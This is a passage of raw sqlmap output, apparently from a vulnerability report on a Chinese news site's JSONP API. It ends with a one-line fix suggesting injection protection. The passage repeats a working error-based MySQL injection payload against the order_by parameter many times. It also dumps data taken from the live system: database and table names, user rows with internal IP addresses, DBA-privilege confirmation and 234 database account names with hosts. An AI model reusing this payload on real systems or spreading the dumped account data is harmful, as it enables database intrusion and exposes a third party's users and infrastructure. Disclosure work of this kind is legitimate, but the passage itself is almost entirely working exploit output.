HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>current user is DBA:	'True'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: apphistory_news<br>[5 tables]<br>+-------------+<br>| figure	|<br>| hot_tag	 |<br>| relate_news |<br>| relate_pic|<br>| stats	 |<br>+-------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_weather<br>[5 tables]<br>+-------------+<br>| abroad	|<br>| airport	 |<br>| internal	|<br>| nephogram |<br>| relate_news |<br>+-------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>[23 tables]<br>+-----------------------------+<br>| hash						|<br>| hdphoto					 |<br>| ip_test					 |<br>| lianghui_2010			 |<br>| lianghui_2010_copy_20100226 |<br>| lianghui_2010_lhyl		|<br>| lianghui_2012			 |<br>| lianghui_2012_lhyl		|<br>| special_diqiuyixiaoshi2010|<br>| special_martyr			|<br>| special_qinghaiyushudizhen|<br>| special_xinanhanzai		 |<br>| timeline					|<br>| tw_vote					 |<br>| upload					|<br>| upload_20121116			 |<br>| upload_v					|<br>| user_test				 |<br>| vote_category			 |<br>| vote_detail				 |<br>| weather_yb				|<br>| weather_yb_tomorrow		 |<br>| weather_zh				|<br>+-----------------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: user_test<br>[2 entries]<br>+----+--------------+------+---------+-------------+---------------------+<br>| id | ip		 | lock | intro | username	| rec_time			|<br>+----+--------------+------+---------+-------------+---------------------+<br>| 1| 220.181.24.2 |	| <blank> | wangyun1127 | 2010-05-10 14:27:06 |<br>| 2| 220.181.24.2 |	| c100	| c100		| 0000-00-00 00:00:00 |<br>+----+--------------+------+---------+-------------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: hash<br>[10 entries]<br>+----+--------------+--------+<br>| id | name		 | value|<br>+----+--------------+--------+<br>| 1| ygdx_gd	| 258	|<br>| 2| ygdx_bsd	 | 306	|<br>| 3| ygdx_zmd	 | 57	 |<br>| 4| ygdx_time	| 5月8日 |<br>| 5| wudu2010_hlb | 198864 |<br>| 6| wudu2010_szc | 150782 |<br>| 7| wudu2010_wyc | 0	|<br>| 8| wudu2010_xsh | 0	|<br>| 9| wudu2010_wwm | 0	|<br>| 10 | wudu2010_zll | 358715 |<br>+----+--------------+--------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: lianghui_2012<br>[10 entries]<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br>| id | type | title | verify | delete | cai_num | content | ding_num | user_name	| user_type | click_num | debate_num | submit_time		 |<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br>| 1| 1	| 1	 | 1	|		| 2	 | 1	 | 3		| kuaibo_10501 | 1		 | 7		 | 0		| 2012-02-28 17:44:30 |<br>| 2| 1	| 11	| 1	|		| 0	 | 1	 | 1		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:47 |<br>| 3| 1	| 2	 | 1	|		| 0	 | 2	 | 1		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:54 |<br>| 4| 1	| 3	 | 1	|		| 0	 | 3	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:59 |<br>| 5| 1	| 4	 | 1	|		| 0	 | 4	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:47:05 |<br>| 6| 1	| 5	 | 1	|		| 1	 | 5	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:47:09 |<br>| 7| 1	| 5	 | 1	|		| 1	 | 5	 | 20	 | kuaibo_10501 | 1		 | 97		| 0		| 2012-02-29 15:47:17 |<br>| 8| 1	| 6	 | 1	|		| 0	 | 6	 | 5		| kuaibo_10501 | 1		 | 107	 | 0		| 2012-02-29 15:47:22 |<br>| 9| 1	| 7	 | 1	|		| 0	 | 7	 | 91	 | kuaibo_10501 | 1		 | 235	 | 0		| 2012-02-29 15:47:26 |<br>| 10 | 1	| 8	 | 1	|		| 2	 | 8	 | 2		| kuaibo_10501 | 1		 | 97		| 0		| 2012-02-29 15:47:31 |<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>current user is DBA:	'True'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>database management system users [234]:<br>[*] ''@'localhost'<br>[*] 'B74wNuTbbx'@'10.11.2.89'<br>[*] 'B74wNuTbbx'@'10.11.2.90'<br>[*] 'B74wNuTbbx'@'10.13.2.134'<br>[*] 'B74wNuTbbx'@'10.13.2.135'<br>[*] 'B74wNuTbbx'@'10.13.2.176'<br>[*] 'B74wNuTbbx'@'10.13.2.177'<br>[*] 'B74wNuTbbx'@'220.181.67.192'<br>[*] 'iadmin'@'211.151.61.77'<br>[*] 'root'@'10.13.2.132'<br>[*] 'root'@'10.13.2.134'<br>[*] 'root'@'10.13.2.135'<br>[*] 'root'@'10.13.2.176'<br>[*] 'root'@'10.13.2.177'<br>[*] 'root'@'127.0.0.1'<br>[*] 'root'@'192.168.2.162'<br>[*] 'root'@'192.168.2.167'<br>[*] 'root'@'220.181.24.100'<br>[*] 'root'@'220.181.24.166'<br>[*] 'root'@'220.181.24.2'<br>[*] 'root'@'220.181.67.192'<br>[*] 'root'@'localhost'<br>[*] 'zabbix'@'127.0.0.1'</blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></code>

修复方案：

还是防注入吧